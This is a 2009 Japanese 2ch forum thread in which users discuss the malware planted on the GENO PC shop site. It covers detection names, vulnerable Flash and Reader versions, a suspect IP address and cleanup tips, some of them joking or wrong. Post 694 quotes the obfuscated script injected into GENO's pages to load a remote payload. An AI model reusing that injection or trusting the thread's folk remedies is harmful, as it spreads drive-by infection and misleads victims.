>>473 ちなみにおいらは猛者じゃないから詳細な解析は無理w
なぁ、自体が一段落したらまとめ動画作ったらおもしろくね? ゲノの対応の悪さの宣伝にもなるし
480 :
プリムラ・ラウレンチアナ(アラバマ州) :2009/04/07(火) 02:06:33.80 ID:SY3MWZSl
481 :
シロウマアサツキ(西日本) :2009/04/07(火) 02:06:37.09 ID:JF7RZ/Wo
>>452 どのidか忘れたけど一瞬真っ黒になったのはその.swfのせいか。
484 :
ねこやなぎ(長屋) :2009/04/07(火) 02:07:25.09 ID:Ej6qxMGK
ん?これAvastだろうがノートン先生だろうが対応できず、踏んだら確実に幹線してたってこと?
だめだ寝る。 念のためにパソはスリープさせとくわ
486 :
ムラサキハナナ(東京都) :2009/04/07(火) 02:09:01.34 ID:Lk+2QR6i
気づかずに短縮url踏んでたりすんのかなぁ・・・・ これ引っかかると目に見えて分かる感じ?
488 :
クロッカス(東日本) :2009/04/07(火) 02:09:54.82 ID:v2pFr5JY
規制中につき携帯から たった今踏んだが、もう直ったんじゃなかったのか? やたらCPU使用率が動くからバスターで検査したら見慣れない変なのがやたら検知されるぞ ちなみにVISTAのホームプレミア
490 :
アルストロメリア(愛知県) :2009/04/07(火) 02:10:42.21 ID:PpAfGl6U
>>487 でも別にウイルスが入ってるってことがわかって少し焦ったんだよ
トロイの木馬だったんで安心した
ウイルス垂れ流しで販売続けてスルーとかw
>>447 不安を煽るような言い方マジでやめてくれ
493 :
ヤエヤマブキ(福岡県) :2009/04/07(火) 02:11:43.15 ID:pgsxCmAv BE:616721459-2BP(8000)
>>483 一番頑張らなきゃいけない板だけどなぁ・・・・・w
494 :
ムラサキハナナ(東京都) :2009/04/07(火) 02:11:54.02 ID:Lk+2QR6i
>>488 Avast先生入ってたけどとっくにライセンスがきれてたわ
これを気に再取得するか
>>486 踏んでGENO開いたけど、メンテ入ったところっぽくて
ブルースクリーンとかそういった症状は出ないな。
496 :
サトザクラ(関西地方) :2009/04/07(火) 02:12:05.86 ID:gVHhPofa
a-squared使いやすくなってるな 昔はaイとか表示されて駄目駄目だったのに
NOD32はまだ対応して無いのか
現状だと各ウイルスソフトとも踏んで感染するのを食い止めるだけなんじゃ? 踏んでからウイルス検査しても意味無いような
もう相当数踏んでるから情報量も莫大になり過ぎて 仕込んだ側も解析しきれんだろうさw 短縮馬鹿はリスクを薄める為にやってんだろう
nod32は3990に更新されたけど、怖くて試せねえや
情弱の俺はマカフィー先生が我が家のPCに問題無しとの判断を下してので寝る たまたま数日GENOに行ってなくて助かったぜ
502 :
クモマグサ(愛媛県) :2009/04/07(火) 02:18:45.57 ID:dlqb+X8n
kickback.cc/upload/stored/up10577.jpg これjaneで踏んだんだけど大丈夫? カスペルスキーは反応しなかった
503 :
コバノランタナ(千葉県) :2009/04/07(火) 02:19:59.13 ID:hD4R3NI8
>>498 おそらくそう。
結局、本来の流れだと書き換えられたjQuery.jsの中の処理の結果、
この↑でうpされたexeが仕込まれてしまう訳で、
結局、書き換えられたjQuery.jsを実行せずに未然に防げば
理論上はPCが感染する事はない訳で。
だから現状の各アンチウィルスソフトの対応内容だけで殆ど問題ないのかとは思うけど、
ただ、気になるのはu.batで具体的にどんな処理をしてるのかってこと。
ぶっちゃけ、u.batの中身が判れば殆ど全貌が明らかになるって事かと。
URLにkickbackがきてたら今回は危ないと認識してるよ
506 :
クモマグサ(愛媛県) :2009/04/07(火) 02:22:34.55 ID:dlqb+X8n
507 :
ハナビシソウ(関西地方) :2009/04/07(火) 02:22:34.56 ID:HRQhxBob
何となくsystem safety monitorが恋しくなってダウンロードを試みたら(検索) 一次配布サイト死亡 + cowscorpion死亡 + amebaメンテナンス で萎えた
もうOS再インストールしようか… 感染したとき外付け繋いでたんだが、これを再インストールした後に繋いだらヤバい?
>>507 comodoのDiffence+オススメ
単体でも使えるし
510 :
ハナビシソウ(関西地方) :2009/04/07(火) 02:24:15.71 ID:HRQhxBob
>>508 PC内にウイルスがにゅるにゅる侵入してきてビクンビクンッ・・・っん!!!!ってなる
511 :
クロッカス(東日本) :2009/04/07(火) 02:24:58.47 ID:v2pFr5JY
既出かもしれんが、裏でコマンドプロンプト上のソフトを動かしてるアプリもある。 そういうソフトを動かした場合はconime.exeがタスクにあっても普通。 例えばMediaCoderとか。
何でこんなに踏んでる馬鹿多いの?w
そこに山があるから登るってやつだ ドMどもが
515 :
ラフレシア(東京都) :2009/04/07(火) 02:31:34.53 ID:Yn6ot/oR
産廃屋なので担当者の脳も産廃レベルでございますってか、まだ残りまくりw
URLは踏んでないけどJaneのキャッシュがどうのこうのってのが気になる
517 :
シュロ(catv?) :2009/04/07(火) 02:33:09.24 ID:r7jE83We
村岡わろた
519 :
ジョウシュウアズマギク(北海道) :2009/04/07(火) 02:34:18.46 ID:xLYVVH7x
>>452 詳しく調べてないが、IE向けの攻撃コードの中に
flashのマイナーバージョンを判別してる箇所がある。
マイナーバージョンの2つ目(x.x.[ここ].x)が124以上なら攻撃用swfは読み込まれない。
以上のことからして、flash player 9.0.124 未満に存在する脆弱性をつくswfだと推測
VIPで貼られてたURLって全部大丈夫なん?
522 :
カンパニュラ・ベリディフォーリア(北海道) :2009/04/07(火) 02:35:57.74 ID:KeanbF3e
523 :
雪割草(岐阜県) :2009/04/07(火) 02:36:49.84 ID:TDbc8y/e
>>521 全部スーパーミラクルデンジャラスですさようなら
踏んで構わんマシンで踏んだ後でカスペのオンラインスキャンやってみた結果。 IEのテンポラリに残ってた。 jquery[1].js 感染:Trojan-Downloader.JS.Agent.dwf A0G6M8XZ\Vy[1].pdf 感染:Exploit.Win32.Pidief.aog Avast!は最新版でも、このファイルを検出しなかった。 Avast!入れてて安心してる人はカスペでもスキャンしてみるといいかも。 どなたかの参考になれば幸い。
セキュ板のAviraスレより --------------------------------------------------- 122 名無しさん@お腹いっぱい。 [sage] 2009/04/07(火) 00:16:22 Geno ウイルス、 PDF と exe には対応したようだ。 \dropper.pdf [0] Archive type: PDF Stream --> Object [DETECTION] Contains recognition pattern of the EXP/Pidief.vtb exploit [WARNING] The file was ignored! \dropper.swf' \malformed.jquery.js' \monitor.bin' \dropper.bin' [DETECTION] Contains a recognition pattern of the (harmful) BDS/Agent.afid back-door program [WARNING] The file was ignored! \dropper.html'
・Foxit Readerなので、Adobe Readerはインストールしていない。 ・Flashは、常に最新版をインストール済み。 ・最新版 Firefox + NoScript(Scriptオフ) + FlashBlockでネットしている。 Windows XPだけど、変なプロセスやあやしい挙動も無いしセーフ。 ああ、良かった。
>>513 PCの安売りスレに出入りしてるとGENOは日常的に訪れるサイトのひとつだろ。
俺はν速にスレが建ってからはGENOに行っていないがけど
最後に行ったのが4/4の前だったか後だったか覚えてないので不安を抱いてる
528 :
ビオラ(アラバマ州) :2009/04/07(火) 02:39:51.83 ID:bWQ+iy28
>>524 それはAdobe Readerが最新(9.1)じゃない状態で?
529 :
サトザクラ(香川県) :2009/04/07(火) 02:40:43.93 ID:uMXDAm/q
少しまえにこれ踏んでしまたかもしれないのだけどどうやって感染してるかわかるの?
530 :
ヒメオドリコソウ(コネチカット州) :2009/04/07(火) 02:41:58.40 ID:IXgeH8s2
Live2ch最強
531 :
カンパニュラ・ベリディフォーリア(北海道) :2009/04/07(火) 02:42:08.75 ID:KeanbF3e
リーダーとフラッシュの脆弱性が原因に挙げられてるけど、これって ・リーダーが最新版でない「かつ」フラッシュが最新版でない ・リーダーが最新版でない「または」フラッシュが最新版でない のどっちがウイルスにやられるの?
もう実害でるまで放っておけよ
>>524 参考になった
マジ産休
でもカスペのオンラインスキャンって一度avast!をアンインスコしなきゃ駄目なんだよな
あー面倒だ
535 :
ボケ(アラバマ州) :2009/04/07(火) 02:43:20.17 ID:uu+cxq1W
536 :
サイネリア(北海道) :2009/04/07(火) 02:44:37.16 ID:5+Bph+6x
重くならないなら何の情報でもくれてやるのに
>>527 最後にゲノが四月二日なんだよな、助かったマジで
539 :
ラフレシア(東京都) :2009/04/07(火) 02:47:23.40 ID:Yn6ot/oR
「PCの安売りスレに出入りしてるとGENOは日常的に訪れるサイトのひとつだろ。 」 wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
特効薬みたいなの無いの? 食らったら死ぬまで?
GENOが安いとか冗談よしてくれ
( ・ω・) んもー ○={=}〇, |:::::::::\, ', ´ 、、、、、、、、、、、し 、、、(((.@)wwwwwwwwwwwwwwwwwwww
543 :
イヌノフグリ(静岡県) :2009/04/07(火) 02:49:51.55 ID:voi8VD7d
結構強烈なウイルスなのに緊急ワクチンでないのはなぜ
544 :
ツルハナシノブ(東京都) :2009/04/07(火) 02:50:09.87 ID:toRvHptP
545 :
ヤエザクラ(dion軍) :2009/04/07(火) 02:51:06.54 ID:xoTLHzSd
>>505 そのレスでjane使いの俺はカカっとツール→キャッシュ一覧で
kickbackとurl検索した俺に隙はなかった
546 :
サトザクラ(香川県) :2009/04/07(火) 02:51:15.35 ID:uMXDAm/q
547 :
マムシグサ(dion軍) :2009/04/07(火) 02:51:16.70 ID:Pgq7lh9W
>>519 詳しい情報、ありがとう
まぁよくよく考えてみたらサーバに仕込まれたファイルなんだから
全く無害のファイルとは考えられないわな
549 :
コバノランタナ(千葉県) :2009/04/07(火) 02:54:29.10 ID:hD4R3NI8
で、Flashは入れてるけどReaderは入れてない俺は大丈夫なの?
552 :
シザンサス(北海道) :2009/04/07(火) 02:54:46.46 ID:1AT369Zt
今の所簡単に分かるのは再起動してブルスクになるかどうかだろう まぁ、感染してたら帰ってこれないけど
>>545 kickback自体は危ないわけではなさそう
でもこの騒動でkickbackは何回か見てるから警戒しといた方がいいな
ThinkPadとかメーカ独自のソフトが動いてるのもあるからconime.exe云々はあてにならん それよりモデムやルータのアクセスログでも見たほうがマシ ログに該当IPがあったらどっちにしてもアウトだがw
555 :
アルストロメリア(愛知県) :2009/04/07(火) 02:55:15.95 ID:PpAfGl6U
GENOとかゴミサイトだろ ショップインバース ユーズドファクトリー PCパレット とかのがいい
CTRLおしながら A O
557 :
ビオラ(アラバマ州) :2009/04/07(火) 03:03:12.49 ID:bWQ+iy28
>>550 脆弱性はFlash Playerのバージョン10.0.12.36以前に存在する。
ユーザーが悪意のあるSWFファイルを閲覧した場合、
システムが外部から制御される恐れのある、危険度の高い脆弱性とされている。
558 :
サイネリア(北海道) :2009/04/07(火) 03:03:44.06 ID:5+Bph+6x
Flash Playerのバージョンはどこで確認するのん?
>>519 WIN 10,0,12,36だた。
最近ウィンドウズのアップデイトはした。
アクロバットリーダーだけがver8なんだよなあ。
もしかして三つの要件が揃わないと発病しないのかな?とオレはオレは楽観主義者を気取ってみる。
561 :
ミゾコウジュミチノクコザクラ(千葉県) :2009/04/07(火) 03:06:34.18 ID:Q/4eCO8y
windowsキー→Uキー二回(素早く これを一回やってみた方がいい
>>559 「flash player バージョン確認」でググると一件目に
564 :
コバノランタナ(千葉県) :2009/04/07(火) 03:10:10.28 ID:hD4R3NI8
>>560 1つでも要件を満たせばアウトというのが最近の流れ
566 :
ミヤマアズマギク(愛知県) :2009/04/07(火) 03:12:43.97 ID:NHRLmOz1
特価品496
http://pc11.2ch.net/test/read.cgi/jisaku/1238831329/ 908 名前:Socket774[sage] 投稿日:2009/04/07(火) 02:47:19 ID:UBlDf3UC
検出されたとかされないとか笑える
トロイなんだから本体が検出されるわけねーじゃんw
カス速民全滅しろや
909 名前:Socket774[sage] 投稿日:2009/04/07(火) 02:49:04 ID:ckw6xCI9
ν速民以外だろそのスレにいるのは
いろんなとこに貼られてるからカスどもが集まってる
>>560 10.0.12.36も欠陥品なので早くアップデートしれ
avastとAviraでやってみたけど何も出てこなかった。 netstat -aと-nbもやってみたけど、94.247.2.195はなかった。
569 :
キンケイギク(神奈川県) :2009/04/07(火) 03:19:30.49 ID:FwqqVpws
java scriptとActiveX切ってれば大丈夫?
トンクス
>>528 その後アップデートしたけど、8.13で踏んだと思う。
572 :
シザンサス(北海道) :2009/04/07(火) 03:20:53.92 ID:1AT369Zt
それにしても村岡sexyウイルス猛威奮いすぎだろ
次スレから「良くある質問回答集」をテンプレに入れろw
574 :
サトザクラ(dion軍) :2009/04/07(火) 03:21:27.35 ID:ly823CjS
俺なんだかんだで感染してなかったみたい outpostが変な反応したんでアプリケーションが再起動するまで 遮断するを選択してセーフだったみたい ラッキー
576 :
ボロニア・ピンナタ(長屋) :2009/04/07(火) 03:25:06.64 ID:9H6YK50+
577 :
アメリカヤマボウシ(千葉県) :2009/04/07(火) 03:27:32.35 ID:txSwIiZQ
なんかよくわからんがvistaなら問題ないっぽいのか? まぁとりあえず色々判明するまでこのスレ監視だな
578 :
ハナビシソウ(関西地方) :2009/04/07(火) 03:29:38.94 ID:HRQhxBob BE:158713872-2BP(0)
どうでもいいけど保存しておいたssmをインスコして起動するには再起動が必要みたいだから
既に入ってたcomodoのdefense+をonにして念には念をとparanoidモードにしたらProcess Governerあたりと干渉して何も出来なくなった
ようするにタスクマネージャーでcomodoデーモンを止めようとする→defense+が発動する無限ループの状態
結局再起動せざるを得なくなった
579 :
ビオラ(アラバマ州) :2009/04/07(火) 03:33:00.55 ID:bWQ+iy28
つかFlashPlayer以上にAdobeReaderなんて普通の人間はアップデートしないんじゃないのかなあ。
581 :
ハナビシソウ(関西地方) :2009/04/07(火) 03:37:51.47 ID:HRQhxBob
>>573 [Q.]感染してそうですが、大丈夫ですか???!!
[A.]タスクマネージャのタスク一覧にconime.exeがあればアウト
[Q.]対処法はありますか?
[A.]
├ 1.再インストール
│
│ [まちがい]
│ 確実な方法ではありますが、時間がかかるのが難点です。
│ それよりも別の手段を探してみませんか?
│ ちょっとしたフリーウェアでなんとかなるかも?
│ ↑
│ ココがポイント!
│
└ 2.RegSeekerを使う
[せいかい]
[Q.]予防策はありますか
[A.]
├ 1.諸々の脆弱性情報に気を配り、常に最新版を利用する
│ Comodo Firewall、Avira Antivirと必要に応じてDefense+も導入する。もちろんブラウザはOpera
│
│ [まちがい]
│
│
└ 2.RegSeekerを使う
[せいかい]
こういう時ほどコピペブログは役に立たんな
583 :
コバノランタナ(千葉県) :2009/04/07(火) 03:39:18.51 ID:hD4R3NI8
>>580 自動アップデートチェックはみんな切って使ってる筈だからね。
24も終わったし生ウィルス扱って無駄にテンション張って疲れちゃったから
そろそろ寝るわw
/ ̄\
| ASUS |
\_/
_|__
/\ /\ excellent !!
/ ⌒ ⌒ \
| (_人_) |
>>581 乙 よくぞまとめた
\ `⌒´ ..X─/ 褒美として P5Qシリーズ を買う権利をやる
ヽ▼●▼< ||ー、.
/ |。| |/ ヽ(ニ、`ヽ.
.l |。| | r-、y `ニ ノ
585 :
コバノランタナ(千葉県) :2009/04/07(火) 03:40:32.94 ID:hD4R3NI8
>>582 連中はリスク負う事は何もしないからなw
他人のふんどしで飯食う事しか眼中になくて腐ってるわ。
さっそく斧にあげられたテスト用のウイルスをばら撒きだしたヤツがいるな
初期のFlashPlayer10がブラクラ並に重かったから未だにver9を使ってる俺 現行のver10って軽くなった?
>>587 別に、初期のころからの奴も
重く感じたことなんてないなぁ
動画サイトみたって、精々cpu使用率10%行くか行かないかだし
p://www.geno.co.jp/4D/images/top/banner_owabi.gif たったこれだけかよw
デスクトップだけで10%くらいメモリ使ってるってことは、感染してるかもしれんのかね
593 :
キンケイギク(神奈川県) :2009/04/07(火) 03:48:39.03 ID:FwqqVpws
9のdebug版使えよ
タスクマネージャー→パフォーマンスを開くと開いた瞬間は70%ぐらいで直ぐに1桁台になるんだが なんかウラでやってるよなあ。
このトロイは一番抜いてるエロ動画がなにかバレてしまう
>>587 重いか軽いかは分からんがスクリプトで実行速度が〜ってのがよく起こった
IE更新したら直ったからIEのせいかもしれんが
597 :
クワガタソウ(京都府) :2009/04/07(火) 03:49:47.13 ID:XoAk2RBo
このウィルス国産なのかどうか知らんけど世界中に拡散して 一向に解決されなかったら酷いことになりそうだな
GENOの名が世界中に知れ渡るね
600 :
サトザクラ(dion軍) :2009/04/07(火) 03:53:11.08 ID:ly823CjS
それが狙いか・・・!
まさにPC界の鳥インフ
602 :
ハナビシソウ(関西地方) :2009/04/07(火) 03:54:42.85 ID:HRQhxBob
>>590 この流れをしっかり踏襲しただけのことさ
562 名前: キバナスミレ(関東・甲信越)[] 投稿日:2009/04/05(日) 17:25:01.57 ID:vha5s7Cg
>>553 俺AdobeReaderなしFlash最新版でその上Javaスクリプトoff、ActiveXもoffで踏んだのに感染した
ちなみにセキュリティソフトはNIS2009
今の所どんな対策しても感染は防げないんじゃないか
577 名前: キバナスミレ(関東・甲信越)[] 投稿日:2009/04/05(日) 17:42:12.62 ID:vha5s7Cg
>>570 アクセスしたらマウスの動きが重くなったんで、おかしいなと
そんでnetstatコマンド打ったら94.247.2.195と通信してた
そしたらコマンドプロンプトが突然落ちた
その後タスクマネージャ見たらconime.exeが動いてた
603 :
シラネアオイ(北海道) :2009/04/07(火) 03:54:54.01 ID:bCOZy87X
堀宮のサイトもトロイが出たらしいが
604 :
クロッカス(コネチカット州) :2009/04/07(火) 03:56:26.21 ID:qo7ZGd7o
春休みが明けてからで良かった
>>590 CMD.exeを実行して閉じてタスクマネージャ見てみ、conime.exeがあるから。
CMD.exeを使ってないしCMD.exeを使うソフトを入れてないのにconime.exeがあったら
何かがCMD.exeを使ったってこと。
conime.exeはコマンドプロンプトで日本語入力をするためのもので、コマンドプロンプトを起動させると一緒に起動する。 よって無害。CMD終了しても残ってるけどなw ためしに、CMD起動→conime終了やってみながら日本語入力試してみろよ。 Alt+半角/全角 で終了前なら入力できるけど、終了後はできないだろ? おれもさっき知ったけど、まともな頭ならこの位ググれば出てくる。 1 CMD起動 2 Alt+半角/全角 で日本語入力してみる 3 Alt+半角/全角 押してオフにする 4 conime.exe終了 5 Alt+半角/全角 押してオンにできるかやってみる
一度コマンドプロンプトを起動したら終了してもconime.exeは動き続けるよ タスクマネージャから終了しても何の問題もないけれど
>>609 conimeが使ったメモリ空間は終了させても開放してくれないのがMS公認の仕様らしいが
微々たるものか
>>607 >netstat -aと-nbもやってみたけど、94.247.2.195はなかった。
612 :
コバノランタナ(千葉県) :2009/04/07(火) 04:18:03.01 ID:hD4R3NI8
>>607 このウィルスを食らった場合以外でも自分でコマンドプロンプトを立ち上げた場合とか、
それ以外の場合でも何かアプリケーションをインストールしてWindowsを再起動した直後の場合とか、
既にインストールされているアプリケーションが起動される際に何気に勝手にコマンドプロンプトを使っている場合もあるので、
必ずしもconime.exeが実行されていたからと言って、必ずしもウィルスに感染しているとは限らない。
おいらが言ってる事が理解出来ないレベルなら、
あれこれ考える前にとっととリカバリするなりクリーンインストールし直したほうがいいよ。
とりあえず普通に再起できて94.247.2.195と通信してなかったらセーフでおk?
なんか同じ流れがずっとループしてんな
615 :
コバノランタナ(千葉県) :2009/04/07(火) 04:22:19.65 ID:hD4R3NI8
>>613 あれこれ考える前にとっととリカバリするなりクリーンインストールし直したほうがいいよ。
616 :
サトザクラ(千葉県) :2009/04/07(火) 04:23:35.24 ID:5NnR5PGs
まとめサイトはまだ作られてないんだ 以前のイメピタとかニコニコに偽装してたzz.tcはすぐにまとめが作られたが今回は遅いな
俺にも感染した 頭痛くてすんごい鼻水出る
619 :
サトザクラ(東京都) :2009/04/07(火) 04:25:06.20 ID:Znka44KP
まだやってたのか 不安を抱えた情弱が騒いでるだけみたいだが
620 :
サトザクラ(東京都) :2009/04/07(火) 04:25:53.92 ID:Znka44KP
この調子だと、無職で童貞なのもGENOのせいになりそうだな
621 :
トベラ(神奈川県) :2009/04/07(火) 04:27:15.37 ID:3DmbuZMk
NoScriptは神。
622 :
コバノランタナ(千葉県) :2009/04/07(火) 04:27:50.27 ID:hD4R3NI8
>>619-620 ここは過疎板のパソコン一般板とは違ってID出るから
あからさまな工作しても笑われるだけだよw
623 :
サトザクラ(東京都) :2009/04/07(火) 04:29:01.38 ID:Znka44KP
>>622 何と戦ってるんだよ?
ウィルスとだけ戦えよ
readerアンインスコした
いっぽうイタリアでは大地震が起きて先に町があぼ〜んしていた
626 :
クワガタソウ(兵庫県) :2009/04/07(火) 04:35:09.35 ID:ccuf3sBW
はじめてvistaで良かったと思ったw
628 :
イヌガラシ(福岡県) :2009/04/07(火) 04:39:39.76 ID:Mv15cr1Z
ウイルスなんて見て見ぬふりですよ
>>625 正直、北朝鮮のミサイルよりもイタリア直下型大地震よりもGENOウイルス俺直撃事件の方がうんと重大だわ。
なんだMacは論外なのか寂しいじゃないか
AdobeReaderインストールしてないで 代わりに別のPDFソフト使ってるんだが大丈夫かな
633 :
トベラ(神奈川県) :2009/04/07(火) 04:45:07.99 ID:3DmbuZMk
>>630 MacのSafariは数年前のブラクラも防げない代物だから使えない。
初めてNoScriptってやつを入れてみたがサイト開くたびにいちいち禁止されてます出てくるのが便利だが煩わしいな 慣れるまでの辛抱か
635 :
トベラ(神奈川県) :2009/04/07(火) 04:53:24.67 ID:3DmbuZMk
636 :
サンダーソニア(アラバマ州) :2009/04/07(火) 04:54:06.39 ID:mt+XV+oP
ツールバーを右クリック→カスタマイズでnoscriptのアイコンをツールバーに追加しておけばいいんじゃないかな。 そうするとオン・オフの切り替えがやりやすい。ステータスバーにも一応表示されてるけど。 あと、ブロックしたとかの通知のオン・オフはオプションで消せるよ。
お前らRegSeekerから幾ら貰ってるんだよw
638 :
トベラ(神奈川県) :2009/04/07(火) 04:58:26.74 ID:3DmbuZMk
>>634 ホワイトリストを作成するのに結構時間がかかるよ。
639 :
セントウソウ(茨城県) :2009/04/07(火) 05:00:03.39 ID:ngCPrkrm
GENOのサイトは完全復旧したの? まだトロイ仕込まれたまんま?
640 :
ポピー(大阪府) :2009/04/07(火) 05:00:31.81 ID:1RBQpE7e
見つけられんが空き容量が減っていってる これは黒と思うべきか…
>>634 自己責任で大丈夫そうなやつとかはWhitelistに入れればいいだけだし
ヘンなモンもらうより全然マシだよ
今回の件でgenoと電話が繋がったりメールで対応来たひといるん?
大丈夫そうな奴をリストに入れておいても それが今回のようにハッキングされたら一緒なんじゃ…
644 :
クロッカス(東日本) :2009/04/07(火) 05:24:03.84 ID:v2pFr5JY
>>640 Avast!いれてそれでも心配ならおいで
なんだこれやばかったのか。 ほとんど報告が無い頃に踏んじゃって、 何だこのサイト異常にメモリ食ってブラウザ落ちるなーと思って何回か開いちゃった。 その後再起動とかもしてるけど特にPCに違和感は無い。 XP、火狐、AVGなんだが大丈夫かな?
>>645 再起動とかもしてるけど特にPCに違和感は無い。
XP、火狐、AVGなんだが大丈夫かな?
これで大丈夫だと思えるのが不思議
647 :
クロッカス(dion軍) :2009/04/07(火) 05:37:50.25 ID:KCpL443s
地味に伸びてるね。もう6か GENOもしかしてまだ対策してないの?とりあえず閉鎖くらいしろよ 4月は踏んでないが先月買い物したからなぁ。個人情報が…
>>540 今のところかかったら特効薬は無い。
死を待つか再インストールのみ。
確実にひっかかった。そこまで重くなってもないし、最低限の作業はできるけど aviraとかセキュリティソフトのアップデートができない。 今カスペインストールして調べてみるところ。あーなにやってるんだろうなこれ。 PC詳しくないからさっっぱりわからん。抜かれて困るようなものは特に無いのが救い・・・
650 :
セントウソウ(中国地方) :2009/04/07(火) 05:55:22.81 ID:OwRG783w
なにか関心の集まることがあると偽情報を流したり危険サイトへ誘導 しようとする奴が即座に現れるようになったな・・・
臨時メンテktkr
復帰した
コレはサーバーとユーザー両方の穴を狙ってるからね しかも、 撃ちこむ実行ファイルの内容は簡単に変更できそうだし 詳細が広まってサーバーとユーザー両方で対策されるまで 亜種がゴロゴロ出てくると思うから GENOに使われたのだけ禁止リストに入れても安心は出来ないだろうな しかし、GENOの対応は最悪だな
アスキーに教えておこう
アリアハンでスライム潰してたら、いきなりギガンデスに襲われたようなものだ
657 :
ミヤコワスレ(山梨県) :2009/04/07(火) 06:32:09.42 ID:6piRtb1x
イ`ヘ /: :| ヽ / : :/ ヽ ___ _,,,:. .-: :´彡フ _ノ\_∠: : : : : : : : :`: :-: :,:_:/彡 / ( : : : : : : : : : : : : : : `ゝ / 悪 r::/: /: : | : : : : : : : : ::\ / //: /: : : |: : | |: : |: _: : : :ヽ 心 {/ 7|`\/i: /|:|/|´: : : : :|ヽ 〉 ,‐-‐、`|7 || |_::|,_|: : :|:::|: | 死 / r:oヽ` /.:oヽヽ: :|: | :| { "ひ) イびゞ /: :|N 了 | ヾ:::ソ ,. ヾ:::ソ /|: : | ! ヽ::::ー-.. ゝ ..ー-::: ヽ::| r--ッ -tヽ/´|`::::::::::; ヽ⌒>::::::::::: /: i } > ::∧: : :|: | └ ´ /::i: | /_ゝ . \ヾ: |::|` - ,, ___ _ ,, - ´|: : :|:::| ヽ: |::|\  ̄/ /| |: : :|: |
658 :
コスミレ(東京都) :2009/04/07(火) 06:35:59.08 ID:8y99Mpqc
どこのアンチウイルスメーカーもこの件についてアナウンスしないな。 というか、GENO自体が検体提出をシステム的にやってないのか? 前に雑誌で見たときにはノートンは24時間体性でウイルスを チェックしてすぐにパターンを出せるって言ってたのに、いまだに 部分的対応しかされてないし、それは他も同じ。 HPのコンフリッカーワームにご注意!ノートンを導入していれば 脅威から守られています。とかアホらしくて涙が出てくる。
いたちごっこになることを望む ラトビア人VSGENO
660 :
ヒヤシンス(福岡県) :2009/04/07(火) 06:40:43.79 ID:pnDf58uK
それっぽいリンクとか踏んだ記憶ないけどこういうの見ると不安になるんだよな それでスキャン始める
661 :
ヤマボウシ(catv?) :2009/04/07(火) 06:43:59.70 ID:ItJq4Ona BE:268788233-PLT(15151)
昨日余裕だろって思って開いたのだが。
これ感染したかどうかすらわからない。
わかる方法あるん?
まぁ他にも気づいてないだけで、やられてるとこもあるだろうしね 何がしたいのかよく分かてないってのが不気味よね
663 :
モクレン(石川県) :2009/04/07(火) 06:56:32.93 ID:jLm5dvjo
ようやく直ったのか?
664 :
ヒサカキ(滋賀県) :2009/04/07(火) 07:04:13.20 ID:+o0F9ypb
ただここのサイトが直っても上で言っているように亜種やそのほかのサイトにも拡散していそうだから、 安心は出来ないね。 しかも、決定的な駆除方法が確立されてないから踏んでしまえば、 もはやOS再インストールしか生きる道が残されないし。
今のRegSeekerは普通に使えると聞いた ちゃんと旧Ver指定したコピペもあったはず
6
668 :
クモマグサ(愛媛県) :2009/04/07(火) 07:08:28.94 ID:dlqb+X8n
これニュースで流すレベルだろw 誰かしらんがテレビでてるやつのブログもやばい状態だったんだろ? これPC初心者とかウイルスの事さえ知らんぞw
670 :
ゲンカイツツジ(アラバマ州) :2009/04/07(火) 07:17:33.35 ID:Pl73fxil
コマンドプロンプトを立ち上げて (*´Д`)ハァハァ をコピペしてEnterすると感染してるかどうかわかるよ
671 :
コスミレ(東京都) :2009/04/07(火) 07:17:57.21 ID:8y99Mpqc
>>664 WINDOWS2000だから誰が起動してるかわからんW
>>669 窓使いじゃない俺に聞かないでくだしあ><
system32(WINDOWSだっけな)以外
すまん自信ない
>>33 >●TrendMicro 8.700.0.1004
> 2009.04.03 PAK_Generic.001
これはVirusTotalなどでの結果だと思うが
「Packerですよ」(圧縮みたいなもの)と言っているだけで
実際は検出しない。要提出。
また感染してるじゃねーかww
676 :
モクレン(石川県) :2009/04/07(火) 07:40:37.78 ID:jLm5dvjo
どうなんだ? まだ踏むとやばいのか?
677 :
ヒヤシンス(福岡県) :2009/04/07(火) 07:42:04.71 ID:pnDf58uK
>>671 違うタスクマネージャ入れたら見れたような記憶違いのような
プロセスの場所も見れるからそれで確かめるのもあり
特集にアンチウイルスソフトがあるのは泣けるなw それもページクリックしただけで感染
681 :
セキチク(関西地方) :2009/04/07(火) 07:49:05.24 ID:A+H9NpvZ
くばってたな。妙なJSあったな。 ウイルス復旧。乙
682 :
モクレン(石川県) :2009/04/07(火) 07:50:01.65 ID:jLm5dvjo
マジで!? 直ってないのか?
ターちゃんの中古部屋、オススメするなよw
684 :
キランソウ(長屋) :2009/04/07(火) 07:53:34.40 ID:Z+exZkfv
genoにアクセスしなければいいだけだろうがwwwwwwwww
685 :
セキチク(関西地方) :2009/04/07(火) 07:56:03.05 ID:A+H9NpvZ
オレはチャレンジャーだから常にキャプチャーソフト立ち上げて覗きに行くぜwww
687 :
クレマチス(埼玉県) :2009/04/07(火) 07:57:09.43 ID:dqr+GOkP
GENOの鯖、完全にクラックされてんじゃねーの?w もしくは、管理権限もってる奴のPC
688 :
スズナ(アラバマ州) :2009/04/07(火) 07:57:55.12 ID:8dbfA7Dm
genoにアクセスしてみたけど特に何も起きない。つまんねー
AVGの更新はいつしたの? 昨日19時ぐらいに更新してスキャンしたんだが
(ヽ三/) )) __ ( i))) / \ \ //・\ /・\\ ) ./::::::  ̄(__人__) ̄::::\ | (⌒)\ | | ,┌、-、!.~〈 \_| _/ | | | | __ヽ、 / レレ'、ノ‐´  ̄〉 | `ー---‐一' ̄
691 :
トベラ(神奈川県) :2009/04/07(火) 08:04:37.84 ID:3DmbuZMk
>>665 流石に大手サイト(大企業や人気サイト)には感染しないだろう?
692 :
クワガタソウ(コネチカット州) :2009/04/07(火) 08:08:21.58 ID:tv2tuZNC
対策としては avast!とJavaスクリプトOffとAdobeリーダー9が最強なの?
693 :
コスミレ(東京都) :2009/04/07(火) 08:08:54.45 ID:8y99Mpqc
GENOがウイルス仕込まれて3日経つのに 何の対策もしてこないのな。 どうなってんだよ。また仕込まれてんのか?
Genoの.jsなんだが <!-- document.write(unescape('%3CsoQcripB9tmO%20smOrc%3DB9%2F%2F94tNt%2EtNt2fq4YMj7tNt%2Ew22YMj%2E19N65rz0%2FjqueryB9%2EmOjoQs%3EBn%3C%2FsmOctNtriN6ptNttYMj%3E').replace(/w2|oQ|YMj|fq|rz0|B9|tNt|N6|Bn|mO/g,"")); --> なんだよこれ、ウィルス復旧してんじゃねぇかw ファイルを元に戻しただけで、そもそもの外部からの侵入口は開いたままだったのかwww
695 :
